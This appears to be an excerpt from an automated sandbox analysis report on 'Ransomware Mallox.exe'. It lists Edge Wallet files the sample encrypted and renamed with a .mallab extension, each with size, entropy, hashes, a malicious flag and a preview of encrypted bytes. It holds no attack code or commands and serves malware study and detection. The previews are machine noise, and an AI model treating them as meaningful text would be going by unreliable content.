                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):58956
                    Entropy (8bit):7.996498332618381
                    Encrypted:true
                    SSDEEP:1536:RzTTXl3KGg/n2TASgpyJQHRm2aoq+QHUt+jA6Ued:hRfjTzgHxm+q/Pzx
                    MD5:1E69CAEBB80C496BCD38A726C149A27B
                    SHA1:1EEF9786A0EA7B7E2C284671A6D6F398D49CB57F
                    SHA-256:F58506A98EDE28FDBDD7D3C611B389ED8B60ECE653D221F77A2C7A3A9702FB85
                    SHA-512:FF7662B9FEEB6FDB56F944054126AB2E3963768D72DEFBD83FB60A221D6E33C15467028459CB7CA666AE8CB7D91A136862D04F1A61D832DA109E9C2425242077
                    Malicious:true
                    Preview:....`C}D...2....=.......W..?eV.....C9+...k....\.8..p.}4..w..N.E.h..w2.....;...;$p..H!.kG......c:E.O-&......Ry..j ;#.Cx*5...Zw.^...Ra.5.....$.@..GZeP...3.y.V.a...+..1.(I1.k..F....u.!M..y.K.+::..QZ[H.`.....ut.~.i&.....qE4....1.....f....u....E_...c....M..<.*...;..0$....[.tn.d~.3?..b>XH..Q..J...i......f.....O..H..;...{..To...d......vBE_8]..;k....f!q.Bs...F...B..^.$.;o.3..6#.\$"a.5..O..(9..g...3Q"..i..tC.xO.C..ZGL........P.V:..3h..e../.(.9.L.'.._<.L.L%j.-#.A.O...@..}E..F(..x>.I...Q...&.]J|c...>.O...|...M...U......\...e.xp.g.....Sy.m#.y.a..w8..[|u..K..|,....?..d.0.*....rmJ.........;...FV......3X$R. .(.!...[+..[..^..#..G..6m.......4.Cpb.....F...bUN53}.C.@.~U{.;....".......u....N.-f./.B.M.........ts..[..ie.b......?.+.......Z.....c...h...Y..?..C~>......C.Y.t...#.<..u.5g......W. w+..|.......t..?...O..\.r.....G%@.q.51o._.....b...lh..q ...w,....2....u.,.9..x.. 2...5.Q$.T......tf....d...z.......d.u.\.4,..a..doV&..S........v..U...v.m..Q.R7...O.......;.=

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):52890
                    Entropy (8bit):7.996330465948828
                    Encrypted:true
                    SSDEEP:1536:kkVzPkl1TEHMShKmzQvYkSklmpofcXNY8EHCsJ5Pr9T:JlBrBIYkR8ofcXNYJxT
                    MD5:725D044A55A4246847465AFCF4E8CFE6
                    SHA1:98960ABF5C23D8E149D6F9AB6A34AD2407B006C4
                    SHA-256:F22993BC50E58B3E91916C403656998983702CFFA3BED29956BAFA82AF945262
                    SHA-512:DE87A3871BDBCBBBCDFD9B9BA20B71E6960E5BEE13AA3578A2A41FA35625E2A9648397F94616B049984284EB44CB8E108D50A0EDA844E9A52089F7D7A67F0BB3
                    Malicious:true
                    Preview:..T.)..4.)._...5U&.T.nm....{...P..bG...A....W.T.....L..5.....*.y).sT.]Nj#..Jy.......8zH...n..j..P.....&P;...Z...4c....&... rB.....E....Y%*..J%....u2..M.4an0peW0i.3.<.".t.."...M^.Q.W..=.{......p...Fn=.^{<b<...p.{..p.Ns....dU..#'.z.ewa )......d..>.b,x.J...c.W...2...)|.....,..-$.{?J...z........r.."C.;.s7h.(<BD...kBl.U..F..q...&?.......f#3Z{/^.O.y~..Py.Ma..m...>.M.....J.o.-... .u.^,.Z..`GC...-.R.3$..m.*Xt...2.2y...K...H..!G.g..vx....?..a.D...YES.a]......]..[.p0qfJ.e^....+..M'o..D.}...9..5a|y/..H....E...........%...<1kH-W..YBW......@m.(#=w...Z..>q..z...f.................-..-...SY4..:....V`.. ^..r6.@..{kOz...4..A.... ..w....K"...i..1XGARv....m..B...~~.cgx.h.5=Y..^..zJ....!J.]}..e........n;..U.....s..-./<.j..d.t....c.R..j....Xww...lo......d._.._....u.h.&....YXPA.....w..+...=.h.k..%(...DF!.(.....7!U-.Po..=..lp.3...tx.....*..6.bQ...5*.....n.5e.\.+.B..t4}...<..J........`#b.,...y..:.l6.....L..5...%.K..@K?......h!..{...l(..G.t.>m.z.h..8..+...y..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):54044
                    Entropy (8bit):7.996546391538985
                    Encrypted:true
                    SSDEEP:1536:IC5EsjiUGyekLDbvYN7/Q0u6NXHvij6Opt6Lq9I:I0xi6eSPuzFXH6Rt6Lq9I
                    MD5:FECE46FD56DAC6F9C12D52D1F6192A97
                    SHA1:458766FDDC1E2A7FFFFEF92B79972139F71E42AD
                    SHA-256:3C70FD54331BC8BB4B1C39DF8B3987FD3BD85951CE1642FCBA73B7825A8B701E
                    SHA-512:B0EC38B78FEB5E6CF652BF21407FD3CB2E98297FC327A9C3C604B8681955B0DB5AC29682F077ACA97242A848FCD0703D21545CF7523B578A8485A76FAE80009C
                    Malicious:true
                    Preview:....&....T...8QM.?....GL.M.n/K...r..5..5...h.....z".....p..I.....^...Y......_</x9G.."9..jI...%.E.....y..2J._......F...|......W.......\.^g.....H.5iI......(.-......s..0 .....!).........:...2%..T..,Z.[h.Y.p.N;C....bj.7'....H...P......$.v..D6.o...5IA.........k#o2..@...B.X:.-.........]....j..[.:.,*).p.....2...."..p.{p.g..S...Q.sR.I.&.!.w....Q...M.J.\.VE./.Q....v`....\...b3..0.g..b..x.<...:Y.5..$".JzY$.Ow`..,Y...o.~t..C..r.....n?...V+..9.%.....}.......9. k...f..rNf}l?a....a6q.f{......3..kJXm.;.*>L.&.,|.?......Q..${...F... .....,.e.T8HR...C%.]'qA..t.A3YF.=.m....... .t.l..xD..Ym.....sJ...,B.j:...kB....A...*@.VQ........Lhp.?..=.c..].V=.!.5..L.*.....^@.h..X.EW...^..FL..?...TU!z..E...2R.N'].....b..6..f.....a.o.......W..._N2.J.ND...V....Q...3..!j..c...o...-(....(?J.I.nC!.....Z.]..8.....<..M<.C.R.z..D"...`}0K:..5.Z... ...w...8n....)............&..M..^...A..F.Y....D0Q..SH..`..h3.gX~R.i/..;.0u.A...`.[:.....HK.P4wo..M?.'...;o..P.....e..j.J>.\..6...2@GO

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10800
                    Entropy (8bit):7.9842695309455785
                    Encrypted:false
                    SSDEEP:192:zdN3D+vPZRIzQly/yRfx2jf1uKCQrvjG9/2WOs3xmVQqmwRADlwaM3E1H1gSwlj4:zyvBQ64QCq9/2Wn8mwRmwvEq8l
                    MD5:25CC2465AA755BC5A004BBAFE13FC430
                    SHA1:27242A6EC328D3D7B959AED7C4209B4C793F00AD
                    SHA-256:482FFCF3B2D1E4A69CE3C495B02030E8C7F1317A195B4379A05E5C348321C390
                    SHA-512:EA8301729B79B91A4E0CE0DBE62268339190D9730A1445A092CB3F8595A0B971337B530621847EE0C1606A6465A8662B8157D44150A0FED358DFB92938D00ABC
                    Malicious:false
                    Preview:.5...v~l[.}.YV..#.t..@.@.........p.0...;.t..zs.u.C......<.a....Q..&.l..2..V..xr..s.....Z....7.x.7w~g......%..Q".....;N...J.....G/$...{.j/q@5.#.{*.}.r...4..k....-h^..cNV'..j..B.....1...D.j...l_B.........f...G...V...S...<.W.y......R...........\...|gD.I.d..nm..Y........r.'........D....._."@!m..dx{..w...V...@?...3..X9; oR...)..hi.......p.*l...y.L.......?;..]..#.;..V....{.B..t......FQ..=.......A.u....;8..\.IW5z*q...[...>Bb........t}...!8X6h.wIP.I0....!e.W. ..A..9P==....6j........w..'..e.2.......M...Y.....[o.L.)..VZ*..I...>..^.K..T,.P{..\<.40. ..x@X..hl...S:.Q...O..qm8.\.Y0...M...F..Fm...n?....~..L4.A>.!.Tm.l...F...Hx.k.jQ...8..$....X.8.Qe.o.H[..Rh.tw&.[.....R..*..$...1..*jj..T.(.n........-n.--l2ES..`.%.........)E.m.Kb.)re..Y....g....5..PI..\......tt~.....6(pjS.5=.|l.p.r.o.....;]......m....-............>.S.l.t...|....Hn.+0....X .u...B..a.......o.'..*.....0.s7....X..R...3...EZ/....t.......V&).....6.`i3.....#.:...S..~..'...pxZ.S.;....+'9.>....DB.T.~.a.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12423
                    Entropy (8bit):7.982990165414812
                    Encrypted:false
                    SSDEEP:192:vjNf5oqUeOsZUjnwrRkpPajyZV47EPsBsNfbYRGKJNpQXpJqxjPKzSWi:7NrzUTwtmak2QD8GCNif8PDT
                    MD5:55492A32EB098743331639C8CB6024F3
                    SHA1:35C368C705A602EE5A5A47E827AD09B88E63E8B6
                    SHA-256:5B53D754D9E2F6FC2327B31CDEC5F7AD806A9ECF9B76BB15769830254D1B6A20
                    SHA-512:6D10685F759FFDE6415DD4B63824C17934A15A2AD09423ECFB283A8E095FAD36D141EA28F47F5816F9644EF942E9CA7D257EDD6310C2AB85262FBE00AE4FB0AF
                    Malicious:false
                    Preview:.d}.......O...~.EVe.x^..Q+.l.......`b..K..#.f...(.Q..%.'...j...'.t[DF.Z...-.`Q..M.b..l./...&..........v......A.h.Sy7|..xLJO9.;.]".....&..[>...v.8...#...e...8......UA~..S/`...W.j...i].G:...W..KJi.ou3..BAE...{..(6.e<.U{f...].r...;M..\.&..q..T.~5J^.Oh6..M...i$.^.f.v#h....n.\]c..i.L\...F.....K..|.....x...T#?..Q\....5..$..G7^.= ..X..>...8..U.J......$;.f..s@.... .........A......m.:.^Q......A1..2.......*";..kf.v.....&.-..?..p..qr[................L...e./75z..[.....^.:..>.D...R}...E!r.......".f|.....Hw....b5.z...,.<.k.kD.";..D..v%.<...Hv.v.....8...8.i.k...4......)..+.-.HdU..X.....V.y..>......>p)...2..4....nq.+.=....H..A.)n...S...@......Y..U.{.!.j.)....K.nm..x....ulm..K)W..r.$yQ.Ls.G..u..~r.o.[..r-".<L.j..j..(.....s.A(.n....>G<qq.X.N.,..i.w.e......1*U..Og..X.Ar,p....?.L..2B..^.e~.4<K.&>...\..qy.PI.YC0%.f.....u D[..~}......%.g.z..?M.i.A....~....h.y....7....Ju....wf..o..:^.u.....B(..[r........SJ.?."?.8.-7..l.....N.u.G.e...,.bd[....f30.3.t

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20784
                    Entropy (8bit):7.990602322188238
                    Encrypted:true
                    SSDEEP:384:G6JDV5ZtbWyYDCCAPuyxHT4uEzUgkZXvO/i3tmYUDXKN5486li0U:GODr3bWfYauQ8/O/qmYUrYp6g
                    MD5:F1A6F839EA62F4D5DEEC950F9E94F404
                    SHA1:BA4BBD30241785338BCCAC5366DF935B6F192A94
                    SHA-256:82C20007730E67E06123BC0CAFCDB0D44ADD485CF311F554515FE83D52848621
                    SHA-512:B72028EDCDA1D39A53D9AAFE95E95AB08F7B3DCE5D6B5F017C24A94D5A03AC74ACFE3D1416BDA65977FB5D7EBB96F23111135A1677AFE26D3A92BBCC1E7FDF1B
                    Malicious:true
                    Preview:.xE. ....S.KT.@F{P.3Q..n...}?]<-.~.$.8?..i..S.....|...Z...".!.H.....$b..iv.K....r &.>..`.......U.oB.^z.|.C....-.l"....0...w\.....R...Fw....O.[.:.J..u....;#.....l.:.&.P[/... 'x...w9...o....f,.'..._...fE.d..>V.;.....U.......00..5h....Q..8..K-^.0.^.e..BI.W...j.] Y.;.:q-....h.q.5,.....$..z...\MH..".I..W..)..D...U_.O....<(Z....5i.b.....O...W8.t.y....,P.K.......U.W..4P.7Jn..?X..".$U9....?.pb.u....(;."B=...(..N....r...A....l...g..?. ...2.((..Zf$=.~?.....uP<.l....._.ojn8[N..!C)+.p/0$....1r[.......@.d.]GX.*'@.....O.Q.oA..p.M.H......`.Mc^....3..p...|..u..s..\X..8....sg.m....SK..4.....*.L.=.Y"..".4..7..?.{3.!..q|\x.Y .Vj..^...'....+~..&.ce.6.........72.... H?I.x.......L....NIPC...^s.4..W...b...^...4h;....(.v.K..y."....nj6.......@...%..a......R."/.p_.xn..;....6....Z.....qI..N?.......'Ska.O.6........|....l.lO._...|.LL......v............E.s.{._~...v<.$.x.U...H.u.)......Z.HW.3e.Y....=...X.....a._H..'Y;,&B...(.C.u.`.*?..]F9.v.....h6%|..+37.<..r...v...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):148401
                    Entropy (8bit):7.998722593575405
                    Encrypted:true
                    SSDEEP:3072:emb7IzsVEyClXYaKNrSDXhabfeAOykHMOAaLe3ULIjHkph1kBw1q:embMYVEyaIHNODobfeAzJmXLIbkph+uk
                    MD5:2D7B01AE4BCB821A399FBDA042636A56
                    SHA1:5838F4545871422AADE3BB178E1CC241AEA7E995
                    SHA-256:9DAF062F76D334C598077ED28DD64B6BAFD2BD54C590216587489A42CF10A2CE
                    SHA-512:B90E2BB9902C7E06BBD2478A16971CC06695B9B01DE902883A501B33CF0A673A758A58A892B6E55C216B0603656EC40CA1B11B574E0CFFC18C9882AB1DF1C891
                    Malicious:true
                    Preview:f.[#...L...^D..Z...!Chw9.F.+HF53..z..Y... ...0A....lR`....G....e....)C....G..0.!Q.W6...B\.j.>......u.D..T....v.....od..)!!..F.....4....CF.y.p..... .n(0......P^.e4....!.....#.nV...x.*...m.q..dab...pn..[....QF....[S..v....8...v.}tn..Nv....I....4.S.MW.r... .7.G.H.H..&...y.}]..P.'......(.f.s.. .U.-.\HSY./+.5U.K.....q..C...~.s!(">.......}....Z..r...R\l..5...VQ.-./.1.. ~....h......r....e....:R&...v..@FJ...S?i....-2....jx.......bP..J.2@..&...S~.Dp.....H...........-.....A.....[a.W..$.D..}.M.(O..dM..q..#..Ju....2g.[..n...\.R..?.".3.....1.P.<......&K..8?O.A.........u.4B......#.&..c.m..s[...8TW.u.....&.^V...id0.Z|t....r.^...Y|.V.o..t..^...T,.J.&..gu.wo.!.wO.F...+...qUm9..48I.^....A..W..KM..4.W`KC?{.....;.zD-..N.Jl}....u..Dq.~.nO...H..PM4..MX.....w+..q.x/..E#..u=c.....;..>.".S...bv....'3.k.....U...f...L..7.V..;18.....@zJ..Za......exs_...'..4s..?t.\3.k....[..$....1.7..((3...Yo.A.}..}...#`..Q.n.v..?o..N..ZT......\..^...F!.JE._/......v[...Wl...o.U..8.(

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):511475
                    Entropy (8bit):7.99967112013042
                    Encrypted:true
                    SSDEEP:12288:dbhE/4XhVdh+rW0GHQnt3hKS7eCkffEwIiP1:8QXhVd0S0GHQTK4eC6SiP1
                    MD5:AF1B7DCD938A765E6F4A6E4D51725C17
                    SHA1:7C238A3C85F96DE68A745FED44680A33B029DE51
                    SHA-256:9D43D9B27508B1DC835AAEC29128BE8BC0080C65A2488DBCBEDF8F214654EEE5
                    SHA-512:F1F61F5B2BC6C480B2DD3AE7E48AD493A7FC94B01D565FD382DD2804DBE4450AE236DBEC75936826E67696F0E02C214199E523892C3561666BEE20B541042ACE
                    Malicious:true
                    Preview:,.7].c..e`l*w$..T+....n.q......m....?...9td....d.v.S..B.........>./...$Yq l.+....w.O=d.~.....W.H..;)...<.....Pu=[.n..c......,.6Is.! ....N.$..."....E,.a...U.X.xE4.....X.'.YG..|..P..T.....rL:......kZr...jsM..'i..F s)t0nvD`.z,..xe.P'.=....BP..O. ...\..z..n.l.MhV..bu...y..9..2+.$..W..h..r..q...e. .]D...... ~........R..Z..m.?$.-..9O.qL.F?q..q..l.P.7......!.....!.{..=...H..k[.],...}.6.\o.%V.+....-Z....[wz..j.Z.F.V.e.s.V.4,..W&.........W..g.k...s.f..3J$s......Y... j..u..........1..n'.k......C...h$.d......$?.c.B.[H..O@.27....2.9}....3|Xq....W..(..l..g2..."..q...E.>)"...x.n.n.....W...._.....u...... an.....y.9V-...J..j..k.Q......x...@w>.$Bewg.s.n.R...........*./.ZV........aI\O5...3.i.qC.$1n.4.Kn...x....k$.}..c........S.3a68.....{.~m.$6.w.O..g.g....MDm&....!.. ...T.....rl+.c......K......Qoc...V..J;.K.4..e.8.....*...g...`.@.....'.j...?...Zj..P.\..6$..-...g#.&?X.3Nc..Uc..FG.z......!c........V5..Z....7j...................f..P........!...$.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout\checkoutdata.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40137
                    Entropy (8bit):7.995614677938172
                    Encrypted:true
                    SSDEEP:768:+JDAXt9sGyfYv8wV4mKCUfWr01KYk6ppbCx8N1OsyCWGoRJOwGsY6BLd:+Nat9sGvv1VvuYYk6pp7N1s1OwG/6z
                    MD5:22FE777C52CC2F968D42B7977CCABCF1
                    SHA1:72E496C0A5EB0943C7820FA0415509B779DFAA94
                    SHA-256:726969C04F76E15AF889AFE9C3DD0C8438068EA32DFE3F8ECCFDAD72C38A240B
                    SHA-512:E465FF1EE43B5105BD0CC5D01A1E839381DD98BC2698B9A6A6D523287D6714442480DA6972CC78DA30CF3F9BF546DB8AD54D240CB496E184FE15AFC9C55B4E73
                    Malicious:true
                    Preview:..o.bg4.(.a.7..'...z.,.T{....$;>...qkES......1..<=Sl.i.".....`..Lk=..EfTfL...e>(....gTq[.dE.0..{y.....N....%`C.hr.,k....q.u}G...y.......ZW"..T.x.W..>......YS.G'u....@Spk....n..bf.Y.}+Sx[............n2&p1...jr+.3{. .<7.m.......k..X...3B.........w.7.........YKk.nHp.\1T...p.d..a......a....zP...D.D....&.x"R...SNqS.(_.G-.k...9'......@.l.....hGd..v...5..u.h].^[.............*f..8."7....L..S.b.....A.........B.......R.dlI.......cj.(t:e...6.E...'$.^....8..IO..E./....?.....L0.+.t.&...Q....x.Sw..(.....-E.....O..Q....>..Of!...OGc.8.-..9.2.F..]..H5.#...4).D'].CL..IT\.b...2....s.;F..7e.q.e.y.WD...q.s...KtD...|...M>G....M..."bos.3(.... ....G.I/..6.O.....3.. ..<..m.-.k.._.?..C5G.....,~.Vj...8.tm<.......}s....3...d.S{..e...u.mb<R.;.2....b._U..l..WQ.X.r!...xe.....1....i]..r.p{.f.#.xF.3....q.Z?K.ss.{(..-.A.8.'D..Q.1(...K.?.......Z.o..Pup..<......H....`+.o......Q...M.e....u.GP}.Ht..'0.egW.x.l.N.....&..M....wT&.~.[V.."...`.{.....|.8\]h......@....'./.:pv.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:DOS executable (COM)
                    Category:dropped
                    Size (bytes):2333613
                    Entropy (8bit):7.999910270357837
                    Encrypted:true
                    SSDEEP:49152:SJGexsVm01wM6SgNAn/CytBNyPQkVD6xVenH:eqYALtBNXkWenH
                    MD5:ABAA87714392CC963175459A9524BF49
                    SHA1:031A83203CEEC737D9EDAC946523396B4F8E38EE
                    SHA-256:D9551CA5EDC5FFBD48E3557A076D4788B39C11C9EDBD38BE9CF7C2BB63193995
                    SHA-512:527EFD61A58E67CFA051D1C184E63B36D3AE153185A366ED380C6420FBCA1484F7722D07C971ED7ABE55F888A2A2E8F00F889C0DE46D7A4740DCA6CF4DF22DE4
                    Malicious:true
                    Preview:.SKt{..n..|u..+..y1r)U.5..*..J+.....;=N].e0.$|.s.)o........<W.........b!..E1...n..k..( ..-.N.I..r..1.C........5X...EJ.a,....8.h...w.OB"...ZJq.I}...D...?A....j.(.x]...:.b..H.I..!/..R..`v...@].US.$....v.~C.."..Gr.;1......{....1.W..u.LAf.0.=-K..2.......4...t..@.+....(x..ax,..G.o.X7h&...d..#...-M..h....F.D......9R..do..g......SvE..o.W...|.T...w.S.u..g.4......Q.....!.M....D........#..}.$j..V.".7..:+F..>.B/x._....P......t68;..[v\....Si._..~.......7.F.P.....1...cZ...n...JN....bk...pX..l....e9aAw.@..........f.... \.p.x...2.,aM*6M...zb>-. ..U..x..S..9...[....<.(....X...Q..5.t..M..x..2..W.6K.../s..Eu....m".P..F............ 0..PtG.t. 1..\.....$.R.......U..'..[.bdf...u+,..$.P....y_.k.....DD......f1.a_.a.........y.wd`}...c/...x...hK"D.......5..P.7.....L..T...z.1.y!.zg.C.....<......Iy..G.Fy..C._\.y...Wf.K.4c.g.}.h3.3.Z........9..Q....u...ID....,.(.?...jK.p4.....Py.8H.>.. ..0.].......p....!e...1...v..8tiy.B...q...2..e.eI.....Y..FK...W.F...L.c3.....E.F

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2333613
                    Entropy (8bit):7.999926006995904
                    Encrypted:true
                    SSDEEP:49152:hjck6x6JF7C9CQPQL3KvuuJ3JMp4yTByYbsLtAdDMgIhO8:hs63MCevzUp4ZATD8
                    MD5:B5CF4855A94F61F469BFF6465FB04CEB
                    SHA1:5908A24741A42BA092B4EA45D2C39EB3808CF184
                    SHA-256:9E13C2265711E2BF8D2716DBD0B9DBF0900E944AB3CC6845959600564CAE6279
                    SHA-512:9A0218F535FC9F7FE4812B10047B3B4CB56C84875FD0C730441C27F8245047EA8D49D6D18BA06BEFF49A3221286ED6B73727664ADF96D575B12D31AB751F61ED
                    Malicious:true
                    Preview:zGe0..=U.zdWG...(....(.OD...O.k+.^5...ey...O.z.F.X&.<....=..\.f.L.LV.....}.a.!#.,...0....J...r....y......,.w.Q.2.....Z....u...v.s &.2t........c....t.>+"..o.V.p.5~..w9?.qN4 .....O.......C......Z(.n...Q.<...q..^...M....1R?-v....r.....P$.1..V.1..6!n*.".^.........H..Z!..^...`....lC.C..G...F.[.......2. ..._...I...h....".. .eU.SoS...q...[.xJ.....J.L+.nZ...k...*."B.l`n.4,.....m+5..q....4.E..m_..2Cvjr./SE0.=2...&wQ....S.......46.... ...6...U*.t......h.q...I.B.@....A.b.H.q.gI.........v..v....$>hH~d..KE.u..+..x...V...x.Hu..'.}.cE....n;..:.k=bF_!.9.....0........;^.,.Gkq.C.....%aJ3.YlJ..Nq.s...w.8}H.....qt.n..A0..D.1"fV..%..........{..Ynv....0.N..\.tn.......bf......F..'.-..GL...$..13....Tp.............n.....V0n..+..u..~...[..H......D&.....0..b....%..B..![..4....wB.8.0...[Z.......;...=..|..y.'H>fe..1.....f.aJd...............D..\..I.7.N......y...U.w.*....[..j..:......1d......<.....z.li...q.K...W..~...v.k....@D..2 }.3r.....IP....}".H.....`..6F.(..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24356
                    Entropy (8bit):7.9933357575107955
                    Encrypted:true
                    SSDEEP:384:dYJGdlWe+n5ILtZnc4znuvc/5vm3dZ3Fn+6XyXgBKaGuud0v:dYlBYuU/5+3b1n++BKPuudO
                    MD5:432903D009F08CC30B41AA8D15057D72
                    SHA1:AB533D2A6BF8B7E2C34F54118C8584EFC93CD370
                    SHA-256:7BECA35F6139C5D4257BB4A96762DB1F2DFEB15C17D2DDDBB54A356DBECDCEDF
                    SHA-512:ED6D339712245E026E2C8FF92C3C97A782A62E5B74BE5C49E750126C3ADAE7BF51953996DCDB1BDB1B275D85D96C05EBF76E76BF22D5B11BFB39714A945F98EA
                    Malicious:true
                    Preview:.#TmEQ..z........_..H.elm...f...[.eU@...=h<.....8....)..Sl+FY..{.......p.crM.t..].....(AY'.fo.-...i..*.L...A7gdR.O..*.x[.....b.........}....Vq.v;v.:4b......7Y..\.q...Ag..YP9_f{..s.!..[....@H......F.v.B.)^.....El;...}.s..{.(g..=..V...gJ.....G...=...Mno....d.T..x..8.2`...y&>..I......S...y0= ..7..kX......K.E..L..H_.&660}......._.C..t..&......@._..kU...9..,$.e....%ClI.a.....@....n4..:.M....d...s.sx..v....@.G......Q._..M..ze.[V..).gQM.;."..~...Z.#..R.6.....3.P...J..>.......T..7.q...C.O$A..U.."..s..7...;..v..-.E).".......$.~d.p@.p.5.$...W.MWj....J..A.8|.uU..w..-........x.......u^Qh..._......b......+./.XO.OM..o.[..k.Sk.t.......,.}.Rz.5Gn6...P.+...;.0s=.$...2..C...+..Tw...v<(c$.....Op.c..mkt..-G}/V..?.l)..OWoL>!.{U.).x,..M.76.Wm..<9....N..y.dHX.G..}..xTts..q?....5.t;Z|[R.....Q.g.T.....!+..H.......Wi'!..r....}...Q...7........N...<......_.....b.5.......9.'.}.J....>>....K.t..m.....>.a..:r.U.Mm..l.r.+.[)..m.....Jw...S.Y....`......Y.P.j.[.3...!6

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28731
                    Entropy (8bit):7.993407000058418
                    Encrypted:true
                    SSDEEP:384:3QUmJjp1Y9eHszZxYi95RnH4aR6mrEBUegyr/R9jo/I8vtayfl/084:3QUmJjLYSG7l4ue9jXAO
                    MD5:909DAB79C07D659591F1332F89922626
                    SHA1:726928C8A09E914F3E0E8C3F7157682051CB41B5
                    SHA-256:72AC17664B20B6FFBC6DD75E1CA8352922552BBD1C10E772ED5A1126FC7763D6
                    SHA-512:D16332B8408889CD3B79F03F88D6E2817D8E157D5056FF7EDFB5DD7F0D7E7ED63D2271BFD3107DE719AD03CF4222B59A29B2EB7C9E7728ADE887A7045C69A6A3
                    Malicious:true
                    Preview:.....9.4..@<.e..A1..../c....z...{.Sw.....f.LVK.(.?....Gs.?..sdD...i.. .+.%.%..)|. ..3..$zl.R.....\..{....~..I.c..u.....0.u....R.....V.<v R*+.(4.c.>..(0<.........?.e..P}....R..Ff.....]...g...>...;w5.)/..Gt..V...J.....r...G.Q.*Q.....J..62..&.........#N...=.qQo.....S.D.\p...Xz.2.;...t3..u.UI....w.....9e9....;..... ..k;.....z.%.K{..Z.....z-.,..w.......~...G._......fN..Ga.C......Z.fq..!.nfF.....v.}<^\.........Z....s.Z:.#.(..2A......k...h.T..S...........L.C#.....;...CB....p...t..PN..K._T.:3;.hOjX.K.cL...8.)NI..w...u"..~0..._.m..JI..rBJ.Q~...4i[O.xhA...R..w..{..]g.S-V.%hr..........ym...12. .K}....I.&.s..^.M..h,.....r...k$....LS}...Me.r.4'..0...q..i..-.9u...@.m....=.5....h..J...'..hHy...'D..H|)[c..eZXH.....!..A:..V..........q.<...g...L9LQv..i. ..v..Cx4..N.qUZZ..d[...w.Q.".].->.R....C..=[....^~...)fI...y...I7.SN.I~.Y.+).Q./..@.........=.2.[......z..$\.*Q3a9.J....O....t>.#.e.g._.G.H%&X..a6..~.).......=.d..`<'.Tv..Q.I..z....c.....).N.. .......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1441041
                    Entropy (8bit):7.999880980052683
                    Encrypted:true
                    SSDEEP:24576:TemDX7Kfv7v6/wMAnHM36t5NSe2v92Oq6vmN43IAaSR/M/E2kaHnLE4PD6:TemvUv7v6WDb9g/MNaoegD6
                    MD5:8A9B725500EC18300D0E1C8033A2CB7B
                    SHA1:DBC37D9BD27C579BC0B9AAA14583457A32C95E0D
                    SHA-256:F849A5905EF5AB5ED46DAAB712B7243995132D57BD1E80DF07D527A2F7FF4CF1
                    SHA-512:266429EB47500AD004313018016C1F15769600EA792734876FD911EB7B5813787E25A211273D56FC7EAC088C879729FADDBA4DDAFC98033CD75990F01E07C743
                    Malicious:true
